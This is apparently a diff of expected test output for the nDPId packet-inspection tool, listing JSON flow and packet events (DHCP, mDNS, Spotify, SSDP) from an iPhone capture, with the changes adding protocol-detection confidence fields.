 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454553219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454553219,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeCUAAP8RQoAAAAAA\/\/\/\/\/wBEAEMBNI0tAQEGAHhURwkAGwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
-00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
+00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01978{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454553606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1199,"pkt_l4_len":1165,"ts_msec":1582454553606,"pkt":"AQBeAAD7xiwDYGpkCABFAASh9MAAAP8RHubAqAIB4AAA+xTpFOkEjReaAACEAAAAAB4AAAALDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\/AAMAAEAABGUAALB7sAMACGAAQAAAHgACAAAAADAAMDpwTMAIYABAAAAeAAIAAAAAAG9wOnBbwAhgAEAAAB4AAgAAAAAAiTA6cGyACGAAQAAAHgACAAAAAAAFsDpwe4AIYABAAAAeAAIAAAAAAAWwOkNTHVjYeKAmXMgaU1hYwRfbmZzwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsKhwqEADAABAAARlAACwpPCkwAhgAEAAAB4AAgAAAAACAHA6Q1MdWNh4oCZcyBpTWFjD19jb21wYW5pb24tbGlua8AhABCAAQAAEZQAWBZycEJBPTU5OjUxOjAyOjJGOkE0OkZGCnJwVnI9MTUyLjERcnBIST0wNzE2ZDA1OTQ0YWYRcnBITj04YjUzMjQzNTlkN2QRcnBIQT0yOGQ0YmVkNTE3ODDAawAMAAEAABGUAALC8cLxAAwAAQAAEZQAAsLjwuMAIYABAAAAeAAIAAAAAMADwOnA6QABgAEAAAB4AATAqAIBwOkAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZMAMAC+AAQAAEZQACcAMAAUAAIAAQMEzAC+AAQAAEZQACcEzAAUAAIAAQMFvAC+AAQAAEZQACcFvAAUAAIAAQMGyAC+AAQAAEZQACcGyAAUAAIAAQMHuAC+AAQAAEZQACcHuAAUAAIAAQMKTAC+AAQAAEZQACcKTAAUAAIAAQMLjAC+AAQAAEZQACcLjAAUAAIAAQMDpAC+AAQAAAHgACMDpAARAAAAIAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1219,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1219,"pkt_l4_len":1165,"ts_msec":1582454553607,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBBI0R\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QSNi88AAIQAAAAAHgAAAAsNTHVjYeKAmXMgaU1hYwZfb2Rpc2sEX3RjcAVsb2NhbAAAEIABAAARlAA0M3N5cz13YU1BPUM0OjJDOjAzOjA2OjQ5OkZFLGFkVkY9MHg0LGFkRFQ9MHgzLGFkQ0M9MAlfc2VydmljZXMHX2Rucy1zZARfdWRwwCYADAABAAARlAACwBrAGgAMAAEAABGUAALADA1MdWNh4oCZcyBpTWFjDF9kZXZpY2UtaW5mb8AhABAAAQAAEZQAGg5tb2RlbD1pTWFjMTEsMwpvc3h2ZXJzPTE3CV9rZXJiZXJvcwpMdWNhcy1pTWFjwCYAEAABAAARlAAzMkxLREM6U0hBMS40OTI0ODBDM0VBODI4Mjc3MUEwRDI4OEYxMTFFRjlFNzUxRjk1QTYzDUx1Y2HigJlzIGlNYWMEX3NtYsAhABCAAQAAEZQAAQDAawAMAAEAABGUAALBQcFBAAwAAQAAEZQAAsEzDUx1Y2HigJlzIGlNYWMLX2FmcG92ZXJ0Y3DAIQAQgAEAABGUAAEAwGsADAABAAARlAACwX3BfQAMAAEAABGUAALBbw1MdWNh4oCZcyBpTWFjBF9zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwcDBwAAMAAEAABGUAALBsg1MdWNh4oCZcyBpTWFjCV9zZnRwLXNzaMAhABCAAQAAEZQAAQDAawAMAAEAABGUAALB\/MH8AAwAAQAAEZQAAsHuwAwAIYABAAAAeAAIAAAAAMAAwOnBMwAhgAEAAAB4AAgAAAAAAb3A6cFvACGAAQAAAHgACAAAAAACJMDpwbIAIYABAAAAeAAIAAAAAAAWwOnB7gAhgAEAAAB4AAgAAAAAABbA6Q1MdWNh4oCZcyBpTWFjBF9uZnPAIQAQgAEAABGUAAEAwGsADAABAAARlAACwqHCoQAMAAEAABGUAALCk8KTACGAAQAAAHgACAAAAAAIAcDpDUx1Y2HigJlzIGlNYWMPX2NvbXBhbmlvbi1saW5rwCEAEIABAAARlABYFnJwQkE9NTk6NTE6MDI6MkY6QTQ6RkYKcnBWcj0xNTIuMRFycEhJPTA3MTZkMDU5NDRhZhFycEhOPThiNTMyNDM1OWQ3ZBFycEhBPTI4ZDRiZWQ1MTc4MMBrAAwAAQAAEZQAAsLxwvEADAABAAARlAACwuPC4wAhgAEAAAB4AAgAAAAAwAPA6cDpAAGAAQAAAHgABMCoAgHA6QAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpkwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAwOkAL4ABAAAAeAAIwOkABEAAAAgAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="}
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
+00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"ts_msec":1582454553607,"pkt":"AQBeAAD72DBiVgAcCABFAAS+xrMAAP8Rg6ip\/uHY4AAA+xTpFOkEqgnaAACEAAAAACAAAAAKDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\/AAMAAEAABGUAALB7sAMACGAAQAAAHgACAAAAADAAMDpwTMAIYABAAAAeAAIAAAAAAG9wOnBbwAhgAEAAAB4AAgAAAAAAiTA6cGyACGAAQAAAHgACAAAAAAAFsDpwe4AIYABAAAAeAAIAAAAAAAWwOkNTHVjYeKAmXMgaU1hYwRfbmZzwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsKhwqEADAABAAARlAACwpPCkwAhgAEAAAB4AAgAAAAACAHA6Q1MdWNh4oCZcyBpTWFjD19jb21wYW5pb24tbGlua8AhABCAAQAAEZQAWBZycEJBPTU5OjUxOjAyOjJGOkE0OkZGCnJwVnI9MTUyLjERcnBIST0wNzE2ZDA1OTQ0YWYRcnBITj04YjUzMjQzNTlkN2QRcnBIQT0yOGQ0YmVkNTE3ODDAawAMAAEAABGUAALC8cLxAAwAAQAAEZQAAsLjwuMAIYABAAAAeAAIAAAAAMADwOkDMjE2AzIyNQMyNTQDMTY5B2luLWFkZHIEYXJwYQAADIABAAAAeAACwOnA6QABgAEAAAB4AASp\/uHYwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAw5UAL4ABAAAAeAAGw5UAAgAIwOkAL4ABAAAAeAAFwOkAAUAAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/tgwYlYAHA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":180000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454556158,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454556158,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABITwkAAEARpUvAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"ts_msec":1582454559629,"pkt":"AQBeAAD7xiwDYGpkCABFAAGGV\/AAAP8RvtHAqAIB4AAA+xTpFOkBcvWXAAAAAAARAAEAAAABCF9haXJwb3J0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAENX2FwcGxlLW1vYmRldsAVAAwAAQg4ZmIyMDdkZQRfc3ViDl9hcHBsZS1tb2JkZXYywBUADAABD19hcHBsZS1wYWlyYWJsZcAVAAwAAQtfZ29vZ2xlY2FzdMAVAAwAAQZfdXNjYW7AFQAMAAEHX3VzY2Fuc8AVAAwAAQdfaXBwdXNiwBUADAABCF9zY2FubmVywBUADAABBF9pcHDAFQAMAAEFX2lwcHPAFQAMAAEIX3ByaW50ZXLAFQAMAAEPX3BkbC1kYXRhc3RyZWFtwBUADAABBF9wdHDAFQAMAAEEX3JmYsAVAAwAAQZfYWRpc2vAFQAMAAHAJQAMAAEAAA4KABANTHVjYeKAmXMgaU1hY8AlAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="}
 00945{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"ts_msec":1582454559629,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QFyac0AAAAAABEAAQAAAAEIX2FpcnBvcnQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQ1fYXBwbGUtbW9iZGV2wBUADAABCDhmYjIwN2RlBF9zdWIOX2FwcGxlLW1vYmRldjLAFQAMAAEPX2FwcGxlLXBhaXJhYmxlwBUADAABC19nb29nbGVjYXN0wBUADAABBl91c2NhbsAVAAwAAQdfdXNjYW5zwBUADAABB19pcHB1c2LAFQAMAAEIX3NjYW5uZXLAFQAMAAEEX2lwcMAVAAwAAQVfaXBwc8AVAAwAAQhfcHJpbnRlcsAVAAwAAQ9fcGRsLWRhdGFzdHJlYW3AFQAMAAEEX3B0cMAVAAwAAQRfcmZiwBUADAABBl9hZGlza8AVAAwAAcAlAAwAAQAADgoAEA1MdWNh4oCZcyBpTWFjwCUAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="}
 00911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"ts_msec":1582454559629,"pkt":"AQBeAAD72DBiVgAcCABFAAGGSisAAP8RA2mp\/uHY4AAA+xTpFOkBciW4AAAAAAARAAEAAAABCF9haXJwb3J0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAENX2FwcGxlLW1vYmRldsAVAAwAAQg4ZmIyMDdkZQRfc3ViDl9hcHBsZS1tb2JkZXYywBUADAABD19hcHBsZS1wYWlyYWJsZcAVAAwAAQtfZ29vZ2xlY2FzdMAVAAwAAQZfdXNjYW7AFQAMAAEHX3VzY2Fuc8AVAAwAAQdfaXBwdXNiwBUADAABCF9zY2FubmVywBUADAABBF9pcHDAFQAMAAEFX2lwcHPAFQAMAAEIX3ByaW50ZXLAFQAMAAEPX3BkbC1kYXRhc3RyZWFtwBUADAABBF9wdHDAFQAMAAEEX3JmYsAVAAwAAQZfYWRpc2vAFQAMAAHAJQAMAAEAAA4KABANTHVjYeKAmXMgaU1hY8AlAAApBaAAABGUABIABAAOAADELAMGSf7YMGJWABw="}
@@ -30,63 +30,63 @@
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454583649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1582454583649,"pkt":"AQBeAAD7xiwDYGpkCABFAABJLHMAAAER6YzAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454585624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1582454585624,"pkt":"AQBef\/\/62DBiVgAcCABFAACab\/sAAP8Rz4Wp\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
